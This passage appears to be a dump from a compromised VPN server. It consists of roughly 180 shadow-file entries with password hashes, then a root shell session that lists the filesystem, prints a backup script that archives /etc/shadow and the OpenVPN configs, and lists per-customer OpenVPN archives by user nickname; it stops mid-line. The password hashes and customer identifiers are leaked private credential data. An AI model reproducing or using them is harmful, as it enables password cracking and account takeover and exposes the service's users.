+vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927: +nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927: +TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928: +2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928: +yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928: +uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988: +tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929: +rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989: +r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929: +88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929: +d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990: +frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930: +DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930: +SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931: +mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931: +Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932: +VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933: +W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933: +UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934: +UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934: +r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936: +lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936: +usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937: +CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937: +vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938: +yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939: +dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940: +ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942: +8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942: +3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942: +mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943: +FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943: +X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944: +KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944: +vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944: +YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944: +XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944: +Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945: +yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945: +VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946: +OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946: +G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946: +CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946: +XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946: +aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947: +mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947: +gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947: +v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949: +Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950: +ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950: +wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951: +76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951: +k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952: +I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952: +GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952: +72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953: +G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953: +HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954: +gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954: +dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015: +4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957: +1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987: +Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958: +OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019: +q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020: +2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961: +ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962: +zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964: +WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964: +bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994: +S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964: +stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965: +OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965: +eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965: +zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966: +RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966: +niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966: +Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967: +klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968: +6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968: +lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968: +4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968: +JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969: +8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969: +vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969: +2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969: +qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970: +muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970: +e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970: +XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030: +va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970: +qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970: +9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970: +Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970: +uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971: +N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972: +gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972: +FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972: +iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972: +ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974: +Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974: +TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974: +wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974: +nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975: +8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975: +JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976: +EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977: +juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977: +TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977: +6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977: +93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977: +N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978: +yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978: +rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979: +zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979: +7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979: +dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979: +azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980: +72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980: +73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985: +UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981: +i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981: +8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983: +kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983: +9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984: +SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984: +8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985: +D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985: +OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986: +gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986: +DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986: +pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986: +f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986: +23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986: +OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987: +6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987: +p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987: +31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987: +P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988: +lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988: +y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988: +qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988: +GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989: +MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991: +inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990: +ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991: +s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991: +UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992: +QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992: +b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992: +pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992: +NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992: +DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992: +tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993: +f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993: +QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993: +Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995: +kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995: +6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996: +Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056: +PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997: +5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327: +ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997: +rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000: +vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972: +itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006: +MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007: +BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007: +9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007: +ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007: +kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008: +WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008: +PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010: +cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011: +iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011: +3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011: + +# cd / && ls -la +total 176 +drwxr-xr-x 20 root root 4096 Jan 6 13:13 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 1024 May 8 2010 .rnd +lrwxrwxrwx 1 root root 39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group +lrwxrwxrwx 1 root root 38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user +-rwxr-xr-x 1 root root 172 Aug 21 21:34 backup.sh +drwxr-xr-x 2 root root 4096 Nov 15 02:26 bin +drwxr-xr-x 2 root root 4096 Feb 2 2010 boot +drwxr-xr-x 7 root root 4096 Jan 6 13:13 dev +-rw-r--r-- 1 root root 4416 Sep 13 14:07 e107_files +drwxr-xr-x 70 root root 4096 Jan 7 19:07 etc +drwxr-xr-x 3 root root 4096 May 9 2010 home +-rw------- 1 root root 0 Nov 2 10:30 ipp.txt +drwxr-xr-x 10 root root 4096 May 11 2010 lib +lrwxrwxrwx 1 root root 4 Nov 25 20:52 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Feb 2 2010 media +drwxr-xr-x 2 root root 4096 Feb 2 2010 mnt +drwxr-xr-x 2 root root 4096 Feb 2 2010 opt +dr-xr-xr-x 171 root root 0 Jan 6 13:13 proc +drwxr-xr-x 5 root root 4096 Jan 4 20:32 root +drwxr-xr-x 2 root root 4096 Feb 2 2010 sbin +drwxr-xr-x 2 root root 4096 Feb 2 2010 selinux +drwxr-xr-x 2 root root 4096 Feb 2 2010 srv +drwxr-xr-x 3 root root 0 Jan 6 13:13 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:12 tmp +drwxr-xr-x 11 root root 4096 Feb 2 2010 usr +drwxr-xr-x 14 root root 4096 Feb 2 2010 var +-rwxr-xr-x 1 root root 83749 Sep 8 21:27 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn_backup.tgz"` +tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow + +# cd /root && ls -la +total 92 +drwxr-xr-x 5 root root 4096 Jan 4 20:32 . +drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. +-rw------- 1 root root 6593 Jan 6 12:59 .bash_history +-rw-r--r-- 1 root root 409 May 9 2010 .bashrc +-rw------- 1 root root 124 Jan 3 13:02 .lesshst +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rw------- 1 root root 1024 Jan 7 05:00 .rnd +drwx------ 2 root root 4096 Jun 20 2010 .ssh +-rw------- 1 root root 6863 Jan 4 20:32 .viminfo +-rw------- 1 root root 2288 Nov 7 00:39 .viminfo.tmp +-rw------- 1 root root 0 Nov 7 00:39 .viminfz.tmp +-rwxr-xr-x 1 root root 698 May 9 2010 createSSHsocks.sh +-rw-r--r-- 1 root root 15716 Sep 13 14:12 e107_plugins +-rwxr-xr-x 1 root root 27 Oct 27 19:50 killsockd.sh +-rw-r--r-- 1 root root 5052 Aug 28 16:06 noVPNaccess +-rw-r--r-- 1 root root 53 Aug 5 00:18 sshCreateLog +drwx------ 2 root root 4096 Nov 7 00:39 v90992 +drwx------ 2 root root 4096 Nov 7 00:39 v90992v90993 + +# cat killsockd.sh +#!/bin/bash + +killall sockd + +# cd /var/www && ls -la +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. +-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 3588 Aug 10 22:04 0x00321279_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 12 2010 0x0032291_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Oct 7 22:28 12dima1226315_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Nov 4 15:41 13scarface3731276_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Dec 8 12:16 21Kms24551_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 2 19:15 2fast17248_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Aug 3 20:35 Anducar31060_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Sep 5 08:18 Anducar7753_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 29 23:55 Anony15422_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jul 4 2010 B0rnBaby4754_OPENVPN.tgz +-rw-r--r-- 1 root root 3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jun 4 2010 Baduila3649_OPENVPN.tgz +-rw-r--r-- 1 root root 3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Sep 13 02:55 Butch1229_OPENVPN.tgz +-rw-r--r-- 1 root root 3617 Jul 1 2010 Butch21700_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 21:57 Butch26236_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Jun 25 2010 CherryPicker28808_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 17 2010 Chillywilly14043_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 Jun 3 2010 Chiruge7152_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz +-rw-r--r-- 1 root root 3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Jun 15 2010 CodeBeat13144_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz +-rw-r--r-- 1 root root 3624 Jun 26 2010 Crackstar133730456_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jun 1 2010 Deadcollector6982_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 20 02:45 Device27308_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Sep 22 02:10 Device31313_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 18 01:50 Device999_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 23 02:05 DingDong32694_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 May 31 2010 Dominik2990_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 03:49 DrHouse30072_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jan 3 07:10 Dukeraider16313_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jul 3 2010 Elite13372193_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Dec 8 19:36 EsseX10367_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 2 21:32 FAM0US10495_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Jul 6 2010 FinalX213616_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Oct 15 05:21 Flex121428_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 18 15:08 Floep19230_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Aug 22 03:57 Floep22106_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 19 2010 Freakzzor30552_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 19 2010 G0ETHE22157_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jul 2 2010 GinTonic30066_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Dec 6 12:38 Haloneros7849_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 28 2010 Hardstyler23602_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 31 00:20 HonigMelone2260_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Jun 30 2010 Joana24614_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 26 12:12 Joana25619_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Nov 3 20:28 Jondoe28020_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 9 16:47 KaLLi17527_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Jul 9 14:55 Kasanova18022_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Nov 4 16:05 Kasanova19712_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Aug 4 13:21 KeyserSoze18958_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 4 2010 LAWest26683_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jul 6 2010 LAWest32033_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 7 12:10 LiipTon17714_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Jul 29 11:58 Loader15498_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 28 12:43 Loader30988_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 5 2010 Loptr20388_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 10 22:07 M000N5312_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 4 22:43 Mandy31362_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 12 2010 Mandy31820_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Sep 2 01:46 Mantis7011486_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 3 17:10 Maxim6745_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz +-rw-r--r-- 1 root root 3622 May 28 2010 McKnad23906_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 3 00:19 McKnad9531_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 01:40 Mutti21505_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 May 12 2010 Mutti8762_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 9 23:21 N3v107908_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Jan 2 11:57 N3v108540_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 7 20:33 NDTBIT26205_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Jul 29 04:41 